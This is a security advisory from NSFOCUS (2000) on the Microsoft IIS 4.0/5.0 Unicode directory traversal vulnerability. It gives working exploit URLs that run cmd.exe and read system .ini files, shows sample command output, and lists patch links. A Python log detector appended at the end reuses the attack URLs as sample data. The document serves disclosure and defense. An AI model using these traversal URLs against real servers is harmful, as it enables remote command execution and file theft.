NSFOCUS Security Advisory (SA2000-06)

Topic: Microsoft IIS 4.0/5.0 Web Directory Traversal Vulnerability

Release Date: Oct 20, 2000

Affected system:
============
Microsoft IIS 4.0
Microsoft IIS 5.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000

Impact:
======
NSFOCUS security team has found a security flaw in the UNICODE decoding implementation of Microsoft IIS 4.0/5.0. By exploiting this vulnerability, a remote malicious user may be able to run arbitrary commands or read the content of system files on a web server running a vulnerable IIS.

Description:
=========
When IIS 5.0 (Chinese version) finds "%c1%hh" or "%c0%hh" (0x00 <= 0xhh < 0x40) in a file name, it decodes "%c1%hh" to (0xc1 - 0xc0) * 0x40 + 0xhh, and "%c0%hh" to (0xc0 - 0xc0) * 0x40 + 0xhh.

For example (Windows 2000 + IIS 5.0 + SP1, Simplified Chinese version):

http://target/A.ida/%c1%00.ida
IIS says "@.ida" can't be found here: (0xc1-0xc0)*0x40+0x00 = 0x40 = '@'

http://target/A.ida/%c1%01.ida
IIS says "A.ida" can't be found here: (0xc1-0xc0)*0x40+0x01 = 0x41 = 'A'

http://target/A.ida/%c1%02.ida
IIS says "B.ida" can't be found
.....

http://target/A.ida/%c0%21.ida
IIS says "!.ida" can't be found
....

This means most characters can be encoded with this feature. For example:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'

So an attacker can bypass the IIS check for "..\" with this trick. It is possible to run arbitrary commands and read system files.

Note: Rain Forest Puppy (rfp@WIRETRIP.NET) has found the same bug in IIS for other language versions. All it needs is to change "%c1%1c" into "%c1%9c", or "%c0%2f" into "%c0%af".

Exploit:
=====
(1) Run an arbitrary command:

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

IIS will return something like this:

 Directory of d:\inetpub\scripts

2000-09-28  15:49                       .
2000-09-28  15:49                       ..
1999-07-21  17:49            147,456    Count.exe
2000-09-12  17:08           1438,290    Count25.exe
2000-10-13  15:03             18,867    counter.err
2000-08-23  23:07           1160,002    counter.exe
1999-05-25  18:14             13,925    CountNT.html
1999-07-21  17:49            164,512    extdgts.exe
2000-08-10  15:24            146,352    ism.dll
1999-07-21  17:49            164,512    mkstrip.exe
1999-05-25  18:18             11,317    README.txt
2000-09-28  15:49                       wcount
               9 File(s)    935,233 bytes

(2) The content of some system files can be read with this bug too:

http://target/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

IIS deems it a request for an .ASP file, so it calls asp.dll to open the file win.ini.

For IIS 4.0 + SP6 (Chinese), the URL above fails. It seems that IIS is getting smarter. But, interestingly, we found that the following malformed URL can trick IIS into returning winnt.ini:

http://target/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" should be an existing .ASP file. "a.exe" is a random .EXE file name; it can be a nonexistent file.

Workaround:
=========
1. If executable CGI is not required, delete the executable virtual directories such as /scripts.
2. If an executable virtual directory is needed, we suggest assigning it a separate local drive.

Solution:
=======
Microsoft has released a security bulletin concerning this flaw. The bulletin is available at:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

Patches are available at:

. Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

. Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

DISCLAIMS:
========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

©Copyright 1999-2000 NSFOCUS. All Rights Reserved.

NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)
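Administrators reviewing IIS logs for this attack can apply the decoding rule from the Description section to each request path and flag any request that resolves to a ".." segment. The Python check below is an added example, not part of the NSFOCUS advisory; its sample request lines are constructed, and extending the rule to the %c1%9c / %c0%af forms from the note by masking the trail byte to its low six bits is an assumption beyond the advisory's text.

```python
import re

# Constructed sample request lines for the demonstration (not real log data).
SAMPLE_REQUESTS = [
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /a.asp/..%c1%1c../..%c1%1c../winnt/win.ini HTTP/1.0",
    "GET /default.asp HTTP/1.0",
    "GET /images/logo%20final.gif HTTP/1.0",
]

# A %c0 or %c1 lead byte immediately followed by one percent-encoded trail byte.
OVERLONG = re.compile(r"%(c[01])%([0-9a-f]{2})", re.IGNORECASE)
REQUEST_LINE = re.compile(r"^\S+\s+(\S+)")


def decode_overlong(path):
    """Apply the advisory's rule to every %c0%hh / %c1%hh pair:
    (lead - 0xc0) * 0x40 + hh.  Masking the trail byte to its low six bits
    (ordinary two-byte UTF-8 arithmetic, an assumption) makes %c1%9c and
    %c0%af decode the same way.  Returns (decoded_path, pairs_replaced)."""
    def repl(m):
        lead = int(m.group(1), 16)
        trail = int(m.group(2), 16) & 0x3F
        return chr((lead - 0xC0) * 0x40 + trail)
    return OVERLONG.subn(repl, path)


def find_traversal(request_line):
    """Return a finding for one request line, or None if nothing suspicious.
    Overlong sequences are never legitimate for ASCII, so their presence is
    reported on its own, as is a '..' segment after decoding."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return None
    raw_path = m.group(1).split("?", 1)[0]           # drop the query string
    decoded, pairs = decode_overlong(raw_path)
    traversal = ".." in re.split(r"[\\/]", decoded)  # IIS accepts both separators
    if pairs == 0 and not traversal:
        return None
    return {"raw": raw_path, "decoded": decoded,
            "overlong_pairs": pairs, "traversal": traversal}


def scan(lines):
    """Run find_traversal over an iterable of request lines."""
    return [f for f in map(find_traversal, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```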